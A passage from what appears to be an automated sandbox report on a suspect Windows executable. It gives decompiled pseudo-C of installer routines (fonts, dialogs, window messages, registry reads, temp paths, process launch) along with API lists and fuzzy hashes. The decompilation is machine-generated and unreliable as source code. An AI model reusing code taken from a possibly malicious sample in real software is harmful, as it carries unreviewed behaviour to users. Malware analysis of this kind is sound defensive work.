                                                                                                                          				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                                                          				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                                                          				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                                                          					DeleteObject(_t48);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                                                          					_push(_t61);
                                                                                                                          					E004061AB();
                                                                                                                          				}
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                                                          • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                                                                          • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                                                          • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E00401E35(intOrPtr __edx) {
                                                                                                                          				void* __esi;
                                                                                                                          				int _t9;
                                                                                                                          				signed char _t15;
                                                                                                                          				struct HFONT__* _t18;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				struct HDC__* _t31;
                                                                                                                          				void* _t33;
                                                                                                                          				void* _t35;
                                                                                                                          
                                                                                                                          				_t30 = __edx;
                                                                                                                          				_t31 = GetDC( *(_t35 - 8));
                                                                                                                          				_t9 = E00402BAC(2);
                                                                                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                          				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                                          				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                                          				 *0x40b860 = E00402BAC(3);
                                                                                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                                                          				 *0x40b867 = 1;
                                                                                                                          				 *0x40b864 = _t15 & 0x00000001;
                                                                                                                          				 *0x40b865 = _t15 & 0x00000002;
                                                                                                                          				 *0x40b866 = _t15 & 0x00000004;
                                                                                                                          				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                                          				_t18 = CreateFontIndirectA(0x40b850);
                                                                                                                          				_push(_t18);
                                                                                                                          				_push(_t33);
                                                                                                                          				E004061AB();
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401E38
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                                                          • ReleaseDC.USER32 ref: 00401E6B
                                                                                                                          • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                                                          • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                                                                          • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                                                          • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                          				char _v36;
                                                                                                                          				char _v68;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t21;
                                                                                                                          				signed int _t22;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t32;
                                                                                                                          				void* _t41;
                                                                                                                          				signed int _t43;
                                                                                                                          				signed int _t47;
                                                                                                                          				signed int _t50;
                                                                                                                          				signed int _t51;
                                                                                                                          				signed int _t53;
                                                                                                                          
                                                                                                                          				_t21 = _a16;
                                                                                                                          				_t51 = _a12;
                                                                                                                          				_t41 = 0xffffffdc;
                                                                                                                          				if(_t21 == 0) {
                                                                                                                          					_push(0x14);
                                                                                                                          					_pop(0);
                                                                                                                          					_t22 = _t51;
                                                                                                                          					if(_t51 < 0x100000) {
                                                                                                                          						_push(0xa);
                                                                                                                          						_pop(0);
                                                                                                                          						_t41 = 0xffffffdd;
                                                                                                                          					}
                                                                                                                          					if(_t51 < 0x400) {
                                                                                                                          						_t41 = 0xffffffde;
                                                                                                                          					}
                                                                                                                          					if(_t51 < 0xffff3333) {
                                                                                                                          						_t50 = 0x14;
                                                                                                                          						asm("cdq");
                                                                                                                          						_t22 = 1 / _t50 + _t51;
                                                                                                                          					}
                                                                                                                          					_t23 = _t22 & 0x00ffffff;
                                                                                                                          					_t53 = _t22 >> 0;
                                                                                                                          					_t43 = 0xa;
                                                                                                                          					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                                          				} else {
                                                                                                                          					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                                          					_t47 = 0;
                                                                                                                          				}
                                                                                                                          				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                                          				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                                          				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
                                                                                                                          				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                                          				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
                                                                                                                          			}




















                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                                                          • wsprintfA.USER32 ref: 00404BC0
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                          • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                                                          • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                                                          • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                                                          • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401C2E(intOrPtr __edx) {
                                                                                                                          				int _t29;
                                                                                                                          				long _t30;
                                                                                                                          				signed int _t32;
                                                                                                                          				CHAR* _t35;
                                                                                                                          				long _t36;
                                                                                                                          				int _t41;
                                                                                                                          				signed int _t42;
                                                                                                                          				int _t46;
                                                                                                                          				int _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				struct HWND__* _t61;
                                                                                                                          				void* _t64;
                                                                                                                          
                                                                                                                          				_t57 = __edx;
                                                                                                                          				_t29 = E00402BAC(3);
                                                                                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                          				 *(_t64 - 8) = _t29;
                                                                                                                          				_t30 = E00402BAC(4);
                                                                                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                          				 *(_t64 + 8) = _t30;
                                                                                                                          				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                                                          					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                                                                                          				}
                                                                                                                          				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                                                          				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                                                          					 *(_t64 + 8) = E00402BCE(0x44);
                                                                                                                          				}
                                                                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                                                          				_push(1);
                                                                                                                          				if(__eflags != 0) {
                                                                                                                          					_t59 = E00402BCE();
                                                                                                                          					_t32 = E00402BCE();
                                                                                                                          					asm("sbb ecx, ecx");
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_t35 =  ~( *_t31) & _t59;
                                                                                                                          					__eflags = _t35;
                                                                                                                          					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                                          					goto L10;
                                                                                                                          				} else {
                                                                                                                          					_t61 = E00402BAC();
                                                                                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                          					_t41 = E00402BAC(2);
                                                                                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                                                                                          					_t56 =  *(_t64 - 0x14) >> 2;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                                                                                          						L10:
                                                                                                                          						 *(_t64 - 0xc) = _t36;
                                                                                                                          					} else {
                                                                                                                          						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                                                                          				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                                                                          					_push( *(_t64 - 0xc));
                                                                                                                          					E004061AB();
                                                                                                                          				}
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                                                          • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                                                          • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                                                          • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405BE5(CHAR* _a4) {
                                                                                                                          				CHAR* _t7;
                                                                                                                          
                                                                                                                          				_t7 = _a4;
                                                                                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                          					lstrcatA(_t7, 0x40a014);
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3916508600
                                                                                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                          • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                          • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040396E() {
                                                                                                                          				void* _t1;
                                                                                                                          				void* _t2;
                                                                                                                          				signed int _t11;
                                                                                                                          
                                                                                                                          				_t1 =  *0x40a018; // 0x2bc
                                                                                                                          				if(_t1 != 0xffffffff) {
                                                                                                                          					CloseHandle(_t1);
                                                                                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                                                          				}
                                                                                                                          				_t2 =  *0x40a01c; // 0x2b4
                                                                                                                          				if(_t2 != 0xffffffff) {
                                                                                                                          					CloseHandle(_t2);
                                                                                                                          					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                                                          					_t11 =  *0x40a01c;
                                                                                                                          				}
                                                                                                                          				E004039CB();
                                                                                                                          				return E00405A15(_t11, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsr575.tmp", 7);
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                                                          • CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsr575.tmp, xrefs: 004039A4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr575.tmp
                                                                                                                          • API String ID: 2962429428-765901027
                                                                                                                          • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                                                          • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                                                          • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                                                          • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                          				int _t15;
                                                                                                                          				long _t16;
                                                                                                                          
                                                                                                                          				_t15 = _a8;
                                                                                                                          				if(_t15 != 0x102) {
                                                                                                                          					if(_t15 != 0x200) {
                                                                                                                          						_t16 = _a16;
                                                                                                                          						L7:
                                                                                                                          						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
                                                                                                                          							_push(_t16);
                                                                                                                          							_push(6);
                                                                                                                          							 *0x42a8a4 = _t16;
                                                                                                                          							E00404CA4();
                                                                                                                          						}
                                                                                                                          						L11:
                                                                                                                          						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
                                                                                                                          					}
                                                                                                                          					if(IsWindowVisible(_a4) == 0) {
                                                                                                                          						L10:
                                                                                                                          						_t16 = _a16;
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          					_t16 = E00404C24(_a4, 1);
                                                                                                                          					_t15 = 0x419;
                                                                                                                          					goto L7;
                                                                                                                          				}
                                                                                                                          				if(_a12 != 0x20) {
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          				E0040431D(0x413);
                                                                                                                          				return 0;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405317
                                                                                                                          • CallWindowProcA.USER32 ref: 00405368
                                                                                                                            • Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                                                          • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                                                          • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                                                          • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                                                                                          				int _v8;
                                                                                                                          				long _t21;
                                                                                                                          				long _t24;
                                                                                                                          				char* _t30;
                                                                                                                          
                                                                                                                          				asm("sbb eax, eax");
                                                                                                                          				_v8 = 0x400;
                                                                                                                          				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                                                          				_t30 = _a16;
                                                                                                                          				if(_t21 != 0) {
                                                                                                                          					L4:
                                                                                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                          				} else {
                                                                                                                          					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                                                          					_t21 = RegCloseKey(_a20);
                                                                                                                          					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                                                                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                          						goto L4;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t21;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004058EC(CHAR* _a4) {
                                                                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                                                                          				int _t7;
                                                                                                                          
                                                                                                                          				0x42c0c0->cb = 0x44;
                                                                                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
                                                                                                                          				if(_t7 != 0) {
                                                                                                                          					CloseHandle(_v20.hThread);
                                                                                                                          					return _v20.hProcess;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 004058FF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405C2C(char* _a4) {
                                                                                                                          				char* _t3;
                                                                                                                          				char* _t5;
                                                                                                                          
                                                                                                                          				_t5 = _a4;
                                                                                                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                          				while( *_t3 != 0x5c) {
                                                                                                                          					_t3 = CharPrevA(_t5, _t3);
                                                                                                                          					if(_t3 > _t5) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                          				return  &(_t3[1]);
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lpdKSOB78u.exe,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405C32
                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lpdKSOB78u.exe,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405C40
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
